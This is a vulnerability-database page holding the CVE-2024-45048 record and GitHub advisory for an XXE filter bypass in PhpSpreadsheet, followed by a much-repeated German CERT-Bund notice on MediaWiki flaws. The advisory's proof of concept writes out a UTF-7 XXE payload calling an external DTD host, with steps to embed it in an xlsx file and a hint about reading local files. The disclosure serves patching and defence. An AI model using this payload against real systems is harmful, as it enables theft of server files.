Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2024-45048 (GCVE-0-2024-45048)
Vulnerability from cvelistv5 – Published: 2024-08-28 20:38 – Updated: 2024-08-29 13:10- CWE-611 - Improper Restriction of XML External Entity Reference
| URL | Tags |
|---|---|
| https://github.com/PHPOffice/PhpSpreadsheet/secur… | x_refsource_CONFIRM |
| https://github.com/PHPOffice/PhpSpreadsheet/commi… | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| PHPOffice | PhpSpreadsheet |
Affected:
< 2.2.1
|
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:phpspreadsheet_project:phpspreadsheet:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "phpspreadsheet",
"vendor": "phpspreadsheet_project",
"versions": [
{
"lessThan": "2.2.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-45048",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-29T13:08:33.737650Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-29T13:10:20.156Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "PhpSpreadsheet",
"vendor": "PHPOffice",
"versions": [
{
"status": "affected",
"version": "\u003c 2.2.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. Affected versions are subject to a bypassing of a filter which allows for an XXE-attack. This in turn allows attacker to obtain contents of local files, even if error reporting is muted. This vulnerability has been addressed in release version 2.2.1. All users are advised to upgrade. There are no known workarounds for this vulnerability."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-611",
"description": "CWE-611: Improper Restriction of XML External Entity Reference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-28T20:38:29.486Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7"
},
{
"name": "https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda"
}
],
"source": {
"advisory": "GHSA-ghg6-32f9-2jp7",
"discovery": "UNKNOWN"
},
"title": "XML External Entity Reference (XXE) in PHPSpreadsheet"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-45048",
"datePublished": "2024-08-28T20:38:29.486Z",
"dateReserved": "2024-08-21T17:53:51.331Z",
"dateUpdated": "2024-08-29T13:10:20.156Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2024-45048",
"date": "2026-05-19",
"epss": "0.00155",
"percentile": "0.35748"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2024-45048\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-08-28T21:15:06.817\",\"lastModified\":\"2024-09-04T17:27:31.517\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. Affected versions are subject to a bypassing of a filter which allows for an XXE-attack. This in turn allows attacker to obtain contents of local files, even if error reporting is muted. This vulnerability has been addressed in release version 2.2.1. All users are advised to upgrade. There are no known workarounds for this vulnerability.\"},{\"lang\":\"es\",\"value\":\"PHPSpreadsheet es una librer\u00eda PHP pura para leer y escribir archivos de hojas de c\u00e1lculo. Las versiones afectadas est\u00e1n sujetas a la omisi\u00f3n de un filtro que permite un ataque XXE. Esto, a su vez, permite al atacante obtener el contenido de los archivos locales, incluso si el informe de errores est\u00e1 silenciado. Esta vulnerabilidad se ha solucionado en la versi\u00f3n 2.2.1. Se recomienda a todos los usuarios que actualicen. No se conocen workarounds para esta vulnerabilidad.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-611\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-611\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.29.1\",\"matchCriteriaId\":\"520A70B7-2C60-4064-B452-538ED7A8D30E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:phpoffice:phpspreadsheet:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.0.0\",\"versionEndExcluding\":\"2.2.1\",\"matchCriteriaId\":\"3D7E4C35-4E3A-42DB-884B-73F028D4A6D6\"}]}]}],\"references\":[{\"url\":\"https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-45048\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-08-29T13:08:33.737650Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:phpspreadsheet_project:phpspreadsheet:*:*:*:*:*:*:*:*\"], \"vendor\": \"phpspreadsheet_project\", \"product\": \"phpspreadsheet\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"2.2.1\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-29T13:10:12.813Z\"}}], \"cna\": {\"title\": \"XML External Entity Reference (XXE) in PHPSpreadsheet\", \"source\": {\"advisory\": \"GHSA-ghg6-32f9-2jp7\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"PHPOffice\", \"product\": \"PhpSpreadsheet\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.2.1\"}]}], \"references\": [{\"url\": \"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7\", \"name\": \"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda\", \"name\": \"https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"PHPSpreadsheet is a pure PHP library for reading and writing spreadsheet files. Affected versions are subject to a bypassing of a filter which allows for an XXE-attack. This in turn allows attacker to obtain contents of local files, even if error reporting is muted. This vulnerability has been addressed in release version 2.2.1. All users are advised to upgrade. There are no known workarounds for this vulnerability.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-611\", \"description\": \"CWE-611: Improper Restriction of XML External Entity Reference\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-08-28T20:38:29.486Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2024-45048\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-08-29T13:10:20.156Z\", \"dateReserved\": \"2024-08-21T17:53:51.331Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-08-28T20:38:29.486Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GHSA-GHG6-32F9-2JP7
Vulnerability from github – Published: 2024-08-29 17:58 – Updated: 2025-03-06 18:10Summary
Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack)
Details
Check $pattern = '/encoding="(.*?)"/'; easy to bypass. Just use a single quote symbol '. So payload looks like this:
<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>
If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute.
PoC
1) Create simple xlsx file
2) Rename xlsx to zip
3) Go to the zip and open the xl/sharedStrings.xml file in edit mode.
4) Replace <?xml version="1.0" encoding="UTF-8" standalone="yes"?> to
<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]>
5) Save sharedStrings.xml file and rename zip back to xlsx.
6) Use minimal php code that simply opens this xlsx file:
use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
7) You will receive the request to your http://%webhook%/file.dtd
8) Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.
Impact
Read local files
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.29.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.1.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpexcel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.8.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-45048"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-29T17:58:27Z",
"nvd_published_at": "2024-08-28T21:15:06Z",
"severity": "HIGH"
},
"details": "### Summary\nBypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) \n\n### Details\nCheck ` $pattern = \u0027/encoding=\"(.*?)\"/\u0027;` easy to bypass. Just use a single quote symbol `\u0027`. So payload looks like this:\n```\n\u003c?xml version=\"1.0\" encoding=\u0027UTF-7\u0027 standalone=\"yes\"?\u003e\n+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM \"http://example.com/file.dtd\"\u003e %xxe;]\u003e\n```\nIf you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. \n\n### PoC\n1) Create simple xlsx file\n2) Rename xlsx to zip\n3) Go to the zip and open the `xl/sharedStrings.xml` file in edit mode.\n4) Replace `\u003c?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?\u003e` to \n```\n\u003c?xml version=\"1.0\" encoding=\u0027UTF-7\u0027 standalone=\"yes\"?\u003e\n+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM \"http://%webhook%/file.dtd\"\u003e %xxe;]\u003e\n```\n5) Save `sharedStrings.xml` file and rename zip back to xlsx.\n6) Use minimal php code that simply opens this xlsx file:\n```\nuse PhpOffice\\PhpSpreadsheet\\IOFactory;\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n$spreadsheet = IOFactory::load(\"file.xlsx\");\n```\n7) You will receive the request to your `http://%webhook%/file.dtd`\n8) Dont\u0027t forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.\n\n### Impact\nRead local files\n",
"id": "GHSA-ghg6-32f9-2jp7",
"modified": "2025-03-06T18:10:41Z",
"published": "2024-08-29T17:58:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45048"
},
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda"
},
{
"type": "PACKAGE",
"url": "https://github.com/PHPOffice/PhpSpreadsheet"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "XXE in PHPSpreadsheet encoding is returned"
}
WID-SEC-W-2024-3087
Vulnerability from csaf_certbund - Published: 2024-10-06 22:00 - Updated: 2025-01-19 23:00Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgemäße Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuführen oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Open Source MediaWiki <1.39.9
Open Source / MediaWiki
|
<1.39.9 | ||
|
Open Source MediaWiki <1.41.3
Open Source / MediaWiki
|
<1.41.3 | ||
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source MediaWiki <1.42.2
Open Source / MediaWiki
|
<1.42.2 | ||
|
Fedora Linux
Fedora
|
cpe:/o:fedoraproject:fedora:-
|
— |
Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgemäße Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuführen oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Open Source MediaWiki <1.39.9
Open Source / MediaWiki
|
<1.39.9 | ||
|
Open Source MediaWiki <1.41.3
Open Source / MediaWiki
|
<1.41.3 | ||
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source MediaWiki <1.42.2
Open Source / MediaWiki
|
<1.42.2 | ||
|
Fedora Linux
Fedora
|
cpe:/o:fedoraproject:fedora:-
|
— |
Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgemäße Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuführen oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Open Source MediaWiki <1.39.9
Open Source / MediaWiki
|
<1.39.9 | ||
|
Open Source MediaWiki <1.41.3
Open Source / MediaWiki
|
<1.41.3 | ||
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source MediaWiki <1.42.2
Open Source / MediaWiki
|
<1.42.2 | ||
|
Fedora Linux
Fedora
|
cpe:/o:fedoraproject:fedora:-
|
— |
Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgemäße Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuführen oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Open Source MediaWiki <1.39.9
Open Source / MediaWiki
|
<1.39.9 | ||
|
Open Source MediaWiki <1.41.3
Open Source / MediaWiki
|
<1.41.3 | ||
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source MediaWiki <1.42.2
Open Source / MediaWiki
|
<1.42.2 | ||
|
Fedora Linux
Fedora
|
cpe:/o:fedoraproject:fedora:-
|
— |
Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgemäße Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuführen oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Open Source MediaWiki <1.39.9
Open Source / MediaWiki
|
<1.39.9 | ||
|
Open Source MediaWiki <1.41.3
Open Source / MediaWiki
|
<1.41.3 | ||
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source MediaWiki <1.42.2
Open Source / MediaWiki
|
<1.42.2 | ||
|
Fedora Linux
Fedora
|
cpe:/o:fedoraproject:fedora:-
|
— |
Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgemäße Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuführen oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Open Source MediaWiki <1.39.9
Open Source / MediaWiki
|
<1.39.9 | ||
|
Open Source MediaWiki <1.41.3
Open Source / MediaWiki
|
<1.41.3 | ||
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source MediaWiki <1.42.2
Open Source / MediaWiki
|
<1.42.2 | ||
|
Fedora Linux
Fedora
|
cpe:/o:fedoraproject:fedora:-
|
— |
Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgemäße Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuführen oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Open Source MediaWiki <1.39.9
Open Source / MediaWiki
|
<1.39.9 | ||
|
Open Source MediaWiki <1.41.3
Open Source / MediaWiki
|
<1.41.3 | ||
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source MediaWiki <1.42.2
Open Source / MediaWiki
|
<1.42.2 | ||
|
Fedora Linux
Fedora
|
cpe:/o:fedoraproject:fedora:-
|
— |
Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgemäße Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuführen oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Open Source MediaWiki <1.39.9
Open Source / MediaWiki
|
<1.39.9 | ||
|
Open Source MediaWiki <1.41.3
Open Source / MediaWiki
|
<1.41.3 | ||
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source MediaWiki <1.42.2
Open Source / MediaWiki
|
<1.42.2 | ||
|
Fedora Linux
Fedora
|
cpe:/o:fedoraproject:fedora:-
|
— |
Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgemäße Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuführen oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Open Source MediaWiki <1.39.9
Open Source / MediaWiki
|
<1.39.9 | ||
|
Open Source MediaWiki <1.41.3
Open Source / MediaWiki
|
<1.41.3 | ||
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source MediaWiki <1.42.2
Open Source / MediaWiki
|
<1.42.2 | ||
|
Fedora Linux
Fedora
|
cpe:/o:fedoraproject:fedora:-
|
— |
Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgemäße Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuführen oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Open Source MediaWiki <1.39.9
Open Source / MediaWiki
|
<1.39.9 | ||
|
Open Source MediaWiki <1.41.3
Open Source / MediaWiki
|
<1.41.3 | ||
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source MediaWiki <1.42.2
Open Source / MediaWiki
|
<1.42.2 | ||
|
Fedora Linux
Fedora
|
cpe:/o:fedoraproject:fedora:-
|
— |
Es bestehen mehrere Schwachstellen in MediaWiki. Diese Fehler existieren in mehreren Modulen, Widgets und Komponenten wie DataTransfer, Cargo oder PageTriage und anderen. Sie werden durch mehrere sicherheitsrelevante Probleme verursacht, wie z. B. eine SQL-Injektion, ein Path Traversal oder eine unsachgemäße Neutralisierung von Eingaben und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, einen Cross-Site-Scripting-Angriff durchzuführen oder Dateien zu manipulieren. Einige dieser Schwachstellen erfordern eine Benutzerinteraktion, um erfolgreich ausgenutzt zu werden.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
Open Source MediaWiki <1.39.9
Open Source / MediaWiki
|
<1.39.9 | ||
|
Open Source MediaWiki <1.41.3
Open Source / MediaWiki
|
<1.41.3 | ||
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source MediaWiki <1.42.2
Open Source / MediaWiki
|
<1.42.2 | ||
|
Fedora Linux
Fedora
|
